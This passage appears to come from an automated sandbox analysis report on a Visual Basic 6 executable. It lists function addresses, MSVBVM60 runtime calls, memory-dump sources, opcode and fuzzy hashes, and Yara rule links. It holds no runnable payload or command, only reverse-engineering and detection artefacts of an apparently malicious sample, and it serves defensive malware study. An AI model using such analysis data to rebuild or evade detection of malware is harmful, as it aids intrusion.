                                                                                                                                                            • Opcode Fuzzy Hash: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                            • Instruction Fuzzy Hash: A031ECB5800248EBDB04DFD4DA58BDEBBB4FF08715F208169E511B72A0DB795A44CB64
                                                                                                                                                            Function 00404843 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D078
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
                                                                                                                                                            • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D1AB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                                                                                            • String ID: ?
                                                                                                                                                            • API String ID: 269068952-1684325040
                                                                                                                                                            • Opcode ID: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                            • Instruction ID: e12f10e6882a07b68982d9b1f0c67d4f52429f3b1a0b66e6b96f65459c310862
                                                                                                                                                            • Opcode Fuzzy Hash: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                            • Instruction Fuzzy Hash: 06511B75900208EBDB14DFA4C948BDEBBB4FF48704F208269F509BB291D7759A85CF68
                                                                                                                                                            Function 00415C8A Relevance: 16.5, APIs: 11, Instructions: 31COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$CloseFile$DestructExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1320429144-0
                                                                                                                                                            • Opcode ID: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                            • Instruction ID: ac45af5dedd4f35385674aac5ef352c541f385de1dfbdc7eb18f47d75152aea7
                                                                                                                                                            • Opcode Fuzzy Hash: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                            • Instruction Fuzzy Hash: 53F0A471C1416CDBCB08EBA0ED55ADDBB38EF94310F11402AE846B31B49E702E85CEA4
                                                                                                                                                            Function 0040E570 Relevance: 15.1, APIs: 10, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
                                                                                                                                                            • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
                                                                                                                                                            • __vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
                                                                                                                                                            • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
                                                                                                                                                            • __vbaChkstk.MSVBVM60 ref: 0040E620
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3705209087-0
                                                                                                                                                            • Opcode ID: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                            • Instruction ID: 36ceea50de92772e66bb97ede622d2113149341719cd49f3f7e07eaeda4390cb
                                                                                                                                                            • Opcode Fuzzy Hash: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                            • Instruction Fuzzy Hash: 9F31F875900208EFCB04DF94C949B9DBBB4FF48304F108669F515B73A0D774AA85CB98
                                                                                                                                                            Function 00404829 Relevance: 12.1, APIs: 8, Instructions: 84COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 306309671-0
                                                                                                                                                            • Opcode ID: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                            • Instruction ID: 6c1e095cc9405d84f172de8fc6481e1172c739fb8f3d4ebecced46b1c4c61411
                                                                                                                                                            • Opcode Fuzzy Hash: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                            • Instruction Fuzzy Hash: 7F312D71910214EBDB10AF95CE89EDEBBBCFF08B40F10412AF545B3690D77899458BA9
                                                                                                                                                            Function 00414D90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60(72A26C4A,00000000), ref: 00414DCE
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60(h#@,72A26C4A,00000000), ref: 00414DE2
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00414E27
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00414E32
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba_adj_fdiv_m64
                                                                                                                                                            • String ID: h#@
                                                                                                                                                            • API String ID: 2746309926-1911584123
                                                                                                                                                            • Opcode ID: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                            • Instruction ID: 05541adafa65650a58b6c4144f1ab09d364fc37ea7f5c0a10f88b274b74e223b
                                                                                                                                                            • Opcode Fuzzy Hash: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                            • Instruction Fuzzy Hash: 2E214570A04301AFC7489F28EB4829ABBE5FBC8351F10853EE584962A4DB7C88D4C71A
                                                                                                                                                            Function 00418E20 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
                                                                                                                                                            • __vbaGetOwner3.MSVBVM60(00407524,0041B108,?), ref: 00418E78
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$OverflowOwner3Redim
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3413436688-0
                                                                                                                                                            • Opcode ID: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                            • Instruction ID: a558a39c5bab9556473eca7b03ab59ba202b493018f5e1d000dd0332b3e70a7e
                                                                                                                                                            • Opcode Fuzzy Hash: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                            • Instruction Fuzzy Hash: F021D338604361EBC714CF14ED65BE17762FB48781B158069EE01A77A5CBB5A8C1CBDC
                                                                                                                                                            Function 0040E6A0 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2392155486-0
                                                                                                                                                            • Opcode ID: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                            • Instruction ID: 64c0aa39b9ec461804333c35a90b8c194e87fd5da105c06a014ba34ae980e718
                                                                                                                                                            • Opcode Fuzzy Hash: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                            • Instruction Fuzzy Hash: 3211BF71900254ABCB00AFA5CD49E9E7B78FF49B04F10852AF945B62E1C77854418BE9
                                                                                                                                                            Function 00417458 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00417458
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Destruct$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1594393734-0
                                                                                                                                                            • Opcode ID: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                            • Instruction ID: 1c4b0c633f18c9e3bddb3555aaad557ebaf8a4bf2d76904fda437b0bccd5ade5
                                                                                                                                                            • Opcode Fuzzy Hash: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                            • Instruction Fuzzy Hash: 00E050B2D58218AAE744D7D0ED45FED7B3CEB84701F004116FA46AA0D89AA02A45CBB5
                                                                                                                                                            Function 0041887E Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0041887E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Destruct$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1594393734-0
                                                                                                                                                            • Opcode ID: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                            • Instruction ID: 7559dc89658ccc2b58e0618bd5d3b53ed62fe53bb83953d9ec1d7c87f6bb5db1
                                                                                                                                                            • Opcode Fuzzy Hash: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                            • Instruction Fuzzy Hash: 0AE050B2D44118AAEB44D7D0ED45FFD7B3CEB84701F04411AFB46AA0D8DAA42A45CFA5
                                                                                                                                                            Function 00410080 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,00000000,004025E6), ref: 004100CE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                              • Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410155
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1207130036-0
                                                                                                                                                            • Opcode ID: 8fdabc13cc4c6212d4883a9d6da8ea5c5544b0dad22eabd4c65c4d2588561482
                                                                                                                                                            • Instruction ID: 7b377bd5de676e89d855d9e41b3201db1aa312fdf1275dcf7b41b08b02665fd4
                                                                                                                                                            • Opcode Fuzzy Hash: 8fdabc13cc4c6212d4883a9d6da8ea5c5544b0dad22eabd4c65c4d2588561482
                                                                                                                                                            • Instruction Fuzzy Hash: 172107B5900348EBDB00DFE5DA49BDEBBB4FF48714F10812AE504B7290D7796A44CBA8
                                                                                                                                                            Function 0040E780 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2075080343-0
                                                                                                                                                            • Opcode ID: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                            • Instruction ID: 3bf4f8c77da95384cc45dd6dff3f381c91b1124e7f22c247587acc69ccce5f1d
                                                                                                                                                            • Opcode Fuzzy Hash: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                            • Instruction Fuzzy Hash: A1015B71940214ABCB00AFA5CE49EAABBB8FF48700F10456AF945B32A1C77854418EA9
                                                                                                                                                            Function 00419674 Relevance: 9.0, APIs: 6, Instructions: 19COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$CloseFile$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2014117853-0
                                                                                                                                                            • Opcode ID: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                            • Instruction ID: dfea4ae46e95b786737fd6ac62915e102b9398e5dcf88c16ee641d2aebd4778e
                                                                                                                                                            • Opcode Fuzzy Hash: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                            • Instruction Fuzzy Hash: 12E01276821128AACB04EBA0FD206DC3BB8FB08310B118026E846B3174DB742D84CFA8
                                                                                                                                                            Function 00418980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$ExitOverflowProc
                                                                                                                                                            • String ID: XuA$x$@
                                                                                                                                                            • API String ID: 3328922952-1101804690
                                                                                                                                                            • Opcode ID: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                            • Instruction ID: f41aac51504d4341bf14d78ed7085f01873fde132ca3eda0e8d0e8435c4d1104
                                                                                                                                                            • Opcode Fuzzy Hash: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                            • Instruction Fuzzy Hash: 310180B5D00254AFC710DF989A056DDFBB4EB08B50F10426BE805A3350C77458408BEA
                                                                                                                                                            Function 0040E250 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
